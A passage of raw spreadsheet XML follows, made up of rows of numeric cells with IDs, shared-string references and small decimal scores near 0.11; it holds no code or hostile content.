    <row r="26875" ht="15.75" customHeight="1">
      <c r="A26875" s="1">
        <v>25724.0</v>
      </c>
      <c r="B26875" s="2">
        <v>1.4541555E7</v>
      </c>
      <c r="C26875" s="2" t="s">
        <v>25835</v>
      </c>
      <c r="D26875" s="2">
        <v>1.0</v>
      </c>
      <c r="E26875" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26875" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26876" ht="15.75" customHeight="1">
      <c r="A26876" s="1">
        <v>26205.0</v>
      </c>
      <c r="B26876" s="2">
        <v>1.6237407E7</v>
      </c>
      <c r="C26876" s="2" t="s">
        <v>25836</v>
      </c>
      <c r="D26876" s="2">
        <v>1.0</v>
      </c>
      <c r="E26876" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26876" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26877" ht="15.75" customHeight="1">
      <c r="A26877" s="1">
        <v>26284.0</v>
      </c>
      <c r="B26877" s="2">
        <v>1.642861E7</v>
      </c>
      <c r="C26877" s="2" t="s">
        <v>25837</v>
      </c>
      <c r="D26877" s="2">
        <v>1.0</v>
      </c>
      <c r="E26877" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26877" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26878" ht="15.75" customHeight="1">
      <c r="A26878" s="1">
        <v>26435.0</v>
      </c>
      <c r="B26878" s="2">
        <v>1.7239587E7</v>
      </c>
      <c r="C26878" s="2" t="s">
        <v>25838</v>
      </c>
      <c r="D26878" s="2">
        <v>1.0</v>
      </c>
      <c r="E26878" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26878" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26879" ht="15.75" customHeight="1">
      <c r="A26879" s="1">
        <v>26545.0</v>
      </c>
      <c r="B26879" s="2">
        <v>1.7751809E7</v>
      </c>
      <c r="C26879" s="2" t="s">
        <v>25839</v>
      </c>
      <c r="D26879" s="2">
        <v>1.0</v>
      </c>
      <c r="E26879" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26879" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26880" ht="15.75" customHeight="1">
      <c r="A26880" s="1">
        <v>26834.0</v>
      </c>
      <c r="B26880" s="2">
        <v>1.8871735E7</v>
      </c>
      <c r="C26880" s="2" t="s">
        <v>25840</v>
      </c>
      <c r="D26880" s="2">
        <v>1.0</v>
      </c>
      <c r="E26880" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26880" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26881" ht="15.75" customHeight="1">
      <c r="A26881" s="1">
        <v>26877.0</v>
      </c>
      <c r="B26881" s="2">
        <v>1.9158067E7</v>
      </c>
      <c r="C26881" s="2" t="s">
        <v>25841</v>
      </c>
      <c r="D26881" s="2">
        <v>1.0</v>
      </c>
      <c r="E26881" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26881" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26882" ht="15.75" customHeight="1">
      <c r="A26882" s="1">
        <v>28228.0</v>
      </c>
      <c r="B26882" s="2">
        <v>2.5138326E7</v>
      </c>
      <c r="C26882" s="2" t="s">
        <v>25842</v>
      </c>
      <c r="D26882" s="2">
        <v>1.0</v>
      </c>
      <c r="E26882" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26882" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26883" ht="15.75" customHeight="1">
      <c r="A26883" s="1">
        <v>28338.0</v>
      </c>
      <c r="B26883" s="2">
        <v>2.5879564E7</v>
      </c>
      <c r="C26883" s="2" t="s">
        <v>25843</v>
      </c>
      <c r="D26883" s="2">
        <v>1.0</v>
      </c>
      <c r="E26883" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26883" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26884" ht="15.75" customHeight="1">
      <c r="A26884" s="1">
        <v>28526.0</v>
      </c>
      <c r="B26884" s="2">
        <v>2.6757394E7</v>
      </c>
      <c r="C26884" s="2" t="s">
        <v>25844</v>
      </c>
      <c r="D26884" s="2">
        <v>1.0</v>
      </c>
      <c r="E26884" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26884" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26885" ht="15.75" customHeight="1">
      <c r="A26885" s="1">
        <v>28813.0</v>
      </c>
      <c r="B26885" s="2">
        <v>2.8699003E7</v>
      </c>
      <c r="C26885" s="2" t="s">
        <v>25845</v>
      </c>
      <c r="D26885" s="2">
        <v>1.0</v>
      </c>
      <c r="E26885" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26885" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26886" ht="15.75" customHeight="1">
      <c r="A26886" s="1">
        <v>29608.0</v>
      </c>
      <c r="B26886" s="2">
        <v>3.3596438E7</v>
      </c>
      <c r="C26886" s="2" t="s">
        <v>25846</v>
      </c>
      <c r="D26886" s="2">
        <v>1.0</v>
      </c>
      <c r="E26886" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26886" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26887" ht="15.75" customHeight="1">
      <c r="A26887" s="1">
        <v>29866.0</v>
      </c>
      <c r="B26887" s="2">
        <v>3.591648E7</v>
      </c>
      <c r="C26887" s="2" t="s">
        <v>25847</v>
      </c>
      <c r="D26887" s="2">
        <v>1.0</v>
      </c>
      <c r="E26887" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26887" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26888" ht="15.75" customHeight="1">
      <c r="A26888" s="1">
        <v>29914.0</v>
      </c>
      <c r="B26888" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C26888" s="2" t="s">
        <v>25848</v>
      </c>
      <c r="D26888" s="2">
        <v>1.0</v>
      </c>
      <c r="E26888" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26888" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26889" ht="15.75" customHeight="1">
      <c r="A26889" s="1">
        <v>30161.0</v>
      </c>
      <c r="B26889" s="2">
        <v>3.704579E7</v>
      </c>
      <c r="C26889" s="2" t="s">
        <v>25849</v>
      </c>
      <c r="D26889" s="2">
        <v>1.0</v>
      </c>
      <c r="E26889" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26889" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26890" ht="15.75" customHeight="1">
      <c r="A26890" s="1">
        <v>30490.0</v>
      </c>
      <c r="B26890" s="2">
        <v>3993072.0</v>
      </c>
      <c r="C26890" s="2" t="s">
        <v>25850</v>
      </c>
      <c r="D26890" s="2">
        <v>1.0</v>
      </c>
      <c r="E26890" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26890" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26891" ht="15.75" customHeight="1">
      <c r="A26891" s="1">
        <v>30815.0</v>
      </c>
      <c r="B26891" s="2">
        <v>4531075.0</v>
      </c>
      <c r="C26891" s="2" t="s">
        <v>25851</v>
      </c>
      <c r="D26891" s="2">
        <v>1.0</v>
      </c>
      <c r="E26891" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26891" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26892" ht="15.75" customHeight="1">
      <c r="A26892" s="1">
        <v>30972.0</v>
      </c>
      <c r="B26892" s="2">
        <v>4.748165E7</v>
      </c>
      <c r="C26892" s="2" t="s">
        <v>25852</v>
      </c>
      <c r="D26892" s="2">
        <v>1.0</v>
      </c>
      <c r="E26892" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26892" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26893" ht="15.75" customHeight="1">
      <c r="A26893" s="1">
        <v>31124.0</v>
      </c>
      <c r="B26893" s="2">
        <v>4.8859221E7</v>
      </c>
      <c r="C26893" s="2" t="s">
        <v>25828</v>
      </c>
      <c r="D26893" s="2">
        <v>1.0</v>
      </c>
      <c r="E26893" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26893" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26894" ht="15.75" customHeight="1">
      <c r="A26894" s="1">
        <v>31162.0</v>
      </c>
      <c r="B26894" s="2">
        <v>4903910.0</v>
      </c>
      <c r="C26894" s="2" t="s">
        <v>25844</v>
      </c>
      <c r="D26894" s="2">
        <v>1.0</v>
      </c>
      <c r="E26894" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26894" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26895" ht="15.75" customHeight="1">
      <c r="A26895" s="1">
        <v>31517.0</v>
      </c>
      <c r="B26895" s="2">
        <v>5078946.0</v>
      </c>
      <c r="C26895" s="2" t="s">
        <v>25853</v>
      </c>
      <c r="D26895" s="2">
        <v>1.0</v>
      </c>
      <c r="E26895" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26895" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26896" ht="15.75" customHeight="1">
      <c r="A26896" s="1">
        <v>31717.0</v>
      </c>
      <c r="B26896" s="2">
        <v>5210923.0</v>
      </c>
      <c r="C26896" s="2" t="s">
        <v>25854</v>
      </c>
      <c r="D26896" s="2">
        <v>1.0</v>
      </c>
      <c r="E26896" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26896" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26897" ht="15.75" customHeight="1">
      <c r="A26897" s="1">
        <v>31946.0</v>
      </c>
      <c r="B26897" s="2">
        <v>5.3098272E7</v>
      </c>
      <c r="C26897" s="2" t="s">
        <v>25855</v>
      </c>
      <c r="D26897" s="2">
        <v>1.0</v>
      </c>
      <c r="E26897" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26897" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26898" ht="15.75" customHeight="1">
      <c r="A26898" s="1">
        <v>32077.0</v>
      </c>
      <c r="B26898" s="2">
        <v>5.3821598E7</v>
      </c>
      <c r="C26898" s="2" t="s">
        <v>25856</v>
      </c>
      <c r="D26898" s="2">
        <v>1.0</v>
      </c>
      <c r="E26898" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26898" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26899" ht="15.75" customHeight="1">
      <c r="A26899" s="1">
        <v>32496.0</v>
      </c>
      <c r="B26899" s="2">
        <v>5705585.0</v>
      </c>
      <c r="C26899" s="2" t="s">
        <v>25857</v>
      </c>
      <c r="D26899" s="2">
        <v>1.0</v>
      </c>
      <c r="E26899" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26899" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26900" ht="15.75" customHeight="1">
      <c r="A26900" s="1">
        <v>32549.0</v>
      </c>
      <c r="B26900" s="2">
        <v>5751102.0</v>
      </c>
      <c r="C26900" s="2" t="s">
        <v>6601</v>
      </c>
      <c r="D26900" s="2">
        <v>1.0</v>
      </c>
      <c r="E26900" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26900" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26901" ht="15.75" customHeight="1">
      <c r="A26901" s="1">
        <v>33850.0</v>
      </c>
      <c r="B26901" s="2">
        <v>9033434.0</v>
      </c>
      <c r="C26901" s="2" t="s">
        <v>25858</v>
      </c>
      <c r="D26901" s="2">
        <v>1.0</v>
      </c>
      <c r="E26901" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26901" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26902" ht="15.75" customHeight="1">
      <c r="A26902" s="1">
        <v>34267.0</v>
      </c>
      <c r="B26902" s="2">
        <v>1.5111874E7</v>
      </c>
      <c r="C26902" s="2" t="s">
        <v>25859</v>
      </c>
      <c r="D26902" s="2">
        <v>1.0</v>
      </c>
      <c r="E26902" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26902" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="26903" ht="15.75" customHeight="1">
      <c r="A26903" s="1">
        <v>700.0</v>
      </c>
      <c r="B26903" s="2">
        <v>2.0457698E7</v>
      </c>
      <c r="C26903" s="2" t="s">
        <v>25860</v>
      </c>
      <c r="D26903" s="2">
        <v>1.0</v>
      </c>
      <c r="E26903" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26903" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26904" ht="15.75" customHeight="1">
      <c r="A26904" s="1">
        <v>1480.0</v>
      </c>
      <c r="B26904" s="2">
        <v>2.7142355E7</v>
      </c>
      <c r="C26904" s="2" t="s">
        <v>25861</v>
      </c>
      <c r="D26904" s="2">
        <v>1.0</v>
      </c>
      <c r="E26904" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26904" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26905" ht="15.75" customHeight="1">
      <c r="A26905" s="1">
        <v>1888.0</v>
      </c>
      <c r="B26905" s="2">
        <v>2.9804457E7</v>
      </c>
      <c r="C26905" s="2" t="s">
        <v>25862</v>
      </c>
      <c r="D26905" s="2">
        <v>1.0</v>
      </c>
      <c r="E26905" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26905" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26906" ht="15.75" customHeight="1">
      <c r="A26906" s="1">
        <v>2148.0</v>
      </c>
      <c r="B26906" s="2">
        <v>3.1626044E7</v>
      </c>
      <c r="C26906" s="2" t="s">
        <v>25863</v>
      </c>
      <c r="D26906" s="2">
        <v>1.0</v>
      </c>
      <c r="E26906" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26906" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26907" ht="15.75" customHeight="1">
      <c r="A26907" s="1">
        <v>5447.0</v>
      </c>
      <c r="B26907" s="2">
        <v>4.5631158E7</v>
      </c>
      <c r="C26907" s="2" t="s">
        <v>25864</v>
      </c>
      <c r="D26907" s="2">
        <v>1.0</v>
      </c>
      <c r="E26907" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26907" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26908" ht="15.75" customHeight="1">
      <c r="A26908" s="1">
        <v>5545.0</v>
      </c>
      <c r="B26908" s="2">
        <v>4.5925699E7</v>
      </c>
      <c r="C26908" s="2" t="s">
        <v>25865</v>
      </c>
      <c r="D26908" s="2">
        <v>1.0</v>
      </c>
      <c r="E26908" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26908" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26909" ht="15.75" customHeight="1">
      <c r="A26909" s="1">
        <v>6814.0</v>
      </c>
      <c r="B26909" s="2">
        <v>4.9540298E7</v>
      </c>
      <c r="C26909" s="2" t="s">
        <v>25866</v>
      </c>
      <c r="D26909" s="2">
        <v>1.0</v>
      </c>
      <c r="E26909" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26909" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26910" ht="15.75" customHeight="1">
      <c r="A26910" s="1">
        <v>7482.0</v>
      </c>
      <c r="B26910" s="2">
        <v>5.1352978E7</v>
      </c>
      <c r="C26910" s="2" t="s">
        <v>25867</v>
      </c>
      <c r="D26910" s="2">
        <v>1.0</v>
      </c>
      <c r="E26910" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26910" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26911" ht="15.75" customHeight="1">
      <c r="A26911" s="1">
        <v>13885.0</v>
      </c>
      <c r="B26911" s="2">
        <v>3.7017291E7</v>
      </c>
      <c r="C26911" s="2" t="s">
        <v>25868</v>
      </c>
      <c r="D26911" s="2">
        <v>1.0</v>
      </c>
      <c r="E26911" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26911" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26912" ht="15.75" customHeight="1">
      <c r="A26912" s="1">
        <v>16772.0</v>
      </c>
      <c r="B26912" s="2">
        <v>4.7685143E7</v>
      </c>
      <c r="C26912" s="2" t="s">
        <v>25869</v>
      </c>
      <c r="D26912" s="2">
        <v>1.0</v>
      </c>
      <c r="E26912" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26912" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26913" ht="15.75" customHeight="1">
      <c r="A26913" s="1">
        <v>16927.0</v>
      </c>
      <c r="B26913" s="2">
        <v>4.8149363E7</v>
      </c>
      <c r="C26913" s="2" t="s">
        <v>25870</v>
      </c>
      <c r="D26913" s="2">
        <v>1.0</v>
      </c>
      <c r="E26913" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26913" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26914" ht="15.75" customHeight="1">
      <c r="A26914" s="1">
        <v>19071.0</v>
      </c>
      <c r="B26914" s="2">
        <v>5.4609169E7</v>
      </c>
      <c r="C26914" s="2" t="s">
        <v>25871</v>
      </c>
      <c r="D26914" s="2">
        <v>1.0</v>
      </c>
      <c r="E26914" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26914" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26915" ht="15.75" customHeight="1">
      <c r="A26915" s="1">
        <v>21194.0</v>
      </c>
      <c r="B26915" s="2">
        <v>1.932789E7</v>
      </c>
      <c r="C26915" s="2" t="s">
        <v>25872</v>
      </c>
      <c r="D26915" s="2">
        <v>1.0</v>
      </c>
      <c r="E26915" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26915" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26916" ht="15.75" customHeight="1">
      <c r="A26916" s="1">
        <v>21639.0</v>
      </c>
      <c r="B26916" s="2">
        <v>2.4723981E7</v>
      </c>
      <c r="C26916" s="2" t="s">
        <v>25873</v>
      </c>
      <c r="D26916" s="2">
        <v>1.0</v>
      </c>
      <c r="E26916" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26916" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26917" ht="15.75" customHeight="1">
      <c r="A26917" s="1">
        <v>22337.0</v>
      </c>
      <c r="B26917" s="2">
        <v>3.4410685E7</v>
      </c>
      <c r="C26917" s="2" t="s">
        <v>25874</v>
      </c>
      <c r="D26917" s="2">
        <v>1.0</v>
      </c>
      <c r="E26917" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26917" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26918" ht="15.75" customHeight="1">
      <c r="A26918" s="1">
        <v>22908.0</v>
      </c>
      <c r="B26918" s="2">
        <v>4.818718E7</v>
      </c>
      <c r="C26918" s="2" t="s">
        <v>25875</v>
      </c>
      <c r="D26918" s="2">
        <v>1.0</v>
      </c>
      <c r="E26918" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26918" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26919" ht="15.75" customHeight="1">
      <c r="A26919" s="1">
        <v>22927.0</v>
      </c>
      <c r="B26919" s="2">
        <v>4.8587867E7</v>
      </c>
      <c r="C26919" s="2" t="s">
        <v>25876</v>
      </c>
      <c r="D26919" s="2">
        <v>1.0</v>
      </c>
      <c r="E26919" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26919" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26920" ht="15.75" customHeight="1">
      <c r="A26920" s="1">
        <v>24866.0</v>
      </c>
      <c r="B26920" s="2">
        <v>1.2208325E7</v>
      </c>
      <c r="C26920" s="2" t="s">
        <v>25877</v>
      </c>
      <c r="D26920" s="2">
        <v>1.0</v>
      </c>
      <c r="E26920" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26920" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26921" ht="15.75" customHeight="1">
      <c r="A26921" s="1">
        <v>25939.0</v>
      </c>
      <c r="B26921" s="2">
        <v>1.5230907E7</v>
      </c>
      <c r="C26921" s="2" t="s">
        <v>25878</v>
      </c>
      <c r="D26921" s="2">
        <v>1.0</v>
      </c>
      <c r="E26921" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26921" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26922" ht="15.75" customHeight="1">
      <c r="A26922" s="1">
        <v>28467.0</v>
      </c>
      <c r="B26922" s="2">
        <v>2.6615476E7</v>
      </c>
      <c r="C26922" s="2" t="s">
        <v>25879</v>
      </c>
      <c r="D26922" s="2">
        <v>1.0</v>
      </c>
      <c r="E26922" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26922" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26923" ht="15.75" customHeight="1">
      <c r="A26923" s="1">
        <v>31716.0</v>
      </c>
      <c r="B26923" s="2">
        <v>5210923.0</v>
      </c>
      <c r="C26923" s="2" t="s">
        <v>25880</v>
      </c>
      <c r="D26923" s="2">
        <v>1.0</v>
      </c>
      <c r="E26923" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26923" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26924" ht="15.75" customHeight="1">
      <c r="A26924" s="1">
        <v>32211.0</v>
      </c>
      <c r="B26924" s="2">
        <v>5.4840879E7</v>
      </c>
      <c r="C26924" s="2" t="s">
        <v>25881</v>
      </c>
      <c r="D26924" s="2">
        <v>1.0</v>
      </c>
      <c r="E26924" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26924" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26925" ht="15.75" customHeight="1">
      <c r="A26925" s="1">
        <v>34244.0</v>
      </c>
      <c r="B26925" s="2">
        <v>4748819.0</v>
      </c>
      <c r="C26925" s="2" t="s">
        <v>25882</v>
      </c>
      <c r="D26925" s="2">
        <v>1.0</v>
      </c>
      <c r="E26925" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26925" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="26926" ht="15.75" customHeight="1">
      <c r="A26926" s="1">
        <v>1182.0</v>
      </c>
      <c r="B26926" s="2">
        <v>2.4637763E7</v>
      </c>
      <c r="C26926" s="2" t="s">
        <v>25883</v>
      </c>
      <c r="D26926" s="2">
        <v>1.0</v>
      </c>
      <c r="E26926" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26926" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="26927" ht="15.75" customHeight="1">
      <c r="A26927" s="1">
        <v>1857.0</v>
      </c>
      <c r="B26927" s="2">
        <v>2.9493043E7</v>
      </c>
      <c r="C26927" s="2" t="s">
        <v>25884</v>
      </c>
      <c r="D26927" s="2">
        <v>1.0</v>
      </c>
      <c r="E26927" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26927" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="26928" ht="15.75" customHeight="1">
      <c r="A26928" s="1">
        <v>6590.0</v>
      </c>
      <c r="B26928" s="2">
        <v>4.897749E7</v>
      </c>
      <c r="C26928" s="2" t="s">
        <v>25885</v>
      </c>
      <c r="D26928" s="2">
        <v>1.0</v>
      </c>
      <c r="E26928" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26928" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="26929" ht="15.75" customHeight="1">
      <c r="A26929" s="1">
        <v>13326.0</v>
      </c>
      <c r="B26929" s="2">
        <v>3.4622867E7</v>
      </c>
      <c r="C26929" s="2" t="s">
        <v>25886</v>
      </c>
      <c r="D26929" s="2">
        <v>1.0</v>
      </c>
      <c r="E26929" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26929" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="26930" ht="15.75" customHeight="1">
      <c r="A26930" s="1">
        <v>15372.0</v>
      </c>
      <c r="B26930" s="2">
        <v>4.2738977E7</v>
      </c>
      <c r="C26930" s="2" t="s">
        <v>25887</v>
      </c>
      <c r="D26930" s="2">
        <v>1.0</v>
      </c>
      <c r="E26930" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26930" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="26931" ht="15.75" customHeight="1">
      <c r="A26931" s="1">
        <v>21391.0</v>
      </c>
      <c r="B26931" s="2">
        <v>2.1776304E7</v>
      </c>
      <c r="C26931" s="2" t="s">
        <v>25888</v>
      </c>
      <c r="D26931" s="2">
        <v>1.0</v>
      </c>
      <c r="E26931" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26931" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="26932" ht="15.75" customHeight="1">
      <c r="A26932" s="1">
        <v>23884.0</v>
      </c>
      <c r="B26932" s="2">
        <v>8398851.0</v>
      </c>
      <c r="C26932" s="2" t="s">
        <v>25889</v>
      </c>
      <c r="D26932" s="2">
        <v>1.0</v>
      </c>
      <c r="E26932" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26932" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="26933" ht="15.75" customHeight="1">
      <c r="A26933" s="1">
        <v>24086.0</v>
      </c>
      <c r="B26933" s="2">
        <v>9758067.0</v>
      </c>
      <c r="C26933" s="2" t="s">
        <v>25890</v>
      </c>
      <c r="D26933" s="2">
        <v>1.0</v>
      </c>
      <c r="E26933" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26933" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="26934" ht="15.75" customHeight="1">
      <c r="A26934" s="1">
        <v>25037.0</v>
      </c>
      <c r="B26934" s="2">
        <v>1.2837056E7</v>
      </c>
      <c r="C26934" s="2" t="s">
        <v>25494</v>
      </c>
      <c r="D26934" s="2">
        <v>1.0</v>
      </c>
      <c r="E26934" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26934" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="26935" ht="15.75" customHeight="1">
      <c r="A26935" s="1">
        <v>26000.0</v>
      </c>
      <c r="B26935" s="2">
        <v>1.5332537E7</v>
      </c>
      <c r="C26935" s="2" t="s">
        <v>25891</v>
      </c>
      <c r="D26935" s="2">
        <v>1.0</v>
      </c>
      <c r="E26935" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26935" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="26936" ht="15.75" customHeight="1">
      <c r="A26936" s="1">
        <v>29147.0</v>
      </c>
      <c r="B26936" s="2">
        <v>3.0589322E7</v>
      </c>
      <c r="C26936" s="2" t="s">
        <v>25892</v>
      </c>
      <c r="D26936" s="2">
        <v>1.0</v>
      </c>
      <c r="E26936" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26936" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="26937" ht="15.75" customHeight="1">
      <c r="A26937" s="1">
        <v>30731.0</v>
      </c>
      <c r="B26937" s="2">
        <v>4.3954146E7</v>
      </c>
      <c r="C26937" s="2" t="s">
        <v>25893</v>
      </c>
      <c r="D26937" s="2">
        <v>1.0</v>
      </c>
      <c r="E26937" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26937" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="26938" ht="15.75" customHeight="1">
      <c r="A26938" s="1">
        <v>31747.0</v>
      </c>
      <c r="B26938" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C26938" s="2" t="s">
        <v>25894</v>
      </c>
      <c r="D26938" s="2">
        <v>1.0</v>
      </c>
      <c r="E26938" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26938" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="26939" ht="15.75" customHeight="1">
      <c r="A26939" s="1">
        <v>34250.0</v>
      </c>
      <c r="B26939" s="2">
        <v>4.924627E7</v>
      </c>
      <c r="C26939" s="2" t="s">
        <v>25895</v>
      </c>
      <c r="D26939" s="2">
        <v>1.0</v>
      </c>
      <c r="E26939" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26939" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="26940" ht="15.75" customHeight="1">
      <c r="A26940" s="1">
        <v>152.0</v>
      </c>
      <c r="B26940" s="2">
        <v>1.3689486E7</v>
      </c>
      <c r="C26940" s="2" t="s">
        <v>25896</v>
      </c>
      <c r="D26940" s="2">
        <v>1.0</v>
      </c>
      <c r="E26940" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26940" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="26941" ht="15.75" customHeight="1">
      <c r="A26941" s="1">
        <v>2531.0</v>
      </c>
      <c r="B26941" s="2">
        <v>3.4097042E7</v>
      </c>
      <c r="C26941" s="2" t="s">
        <v>25897</v>
      </c>
      <c r="D26941" s="2">
        <v>1.0</v>
      </c>
      <c r="E26941" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26941" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="26942" ht="15.75" customHeight="1">
